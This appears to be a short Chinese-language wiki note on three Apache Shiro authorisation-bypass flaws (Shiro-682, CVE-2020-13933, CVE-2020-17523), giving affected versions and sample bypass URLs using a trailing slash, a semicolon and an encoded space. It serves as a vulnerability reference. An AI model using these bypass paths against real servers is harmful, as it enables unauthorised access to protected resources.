跳转至

Shiro 权限绕过漏洞

Shiro-682

Shiro 1.3.2
Shiro < 1.5.0

/admin/1/
即URL结尾添加反斜杠绕过权限验证

CVE-2020-13933

Shiro < 1.6.0

xxx.com/res/;name

当请求的资源存在时即可绕过权限验证查看资源

@三六零CERT

CVE-2020-17523

Apache Shiro < 1.7.1

xxx.com/admin/%20
空格绕过了权限验证

@jweny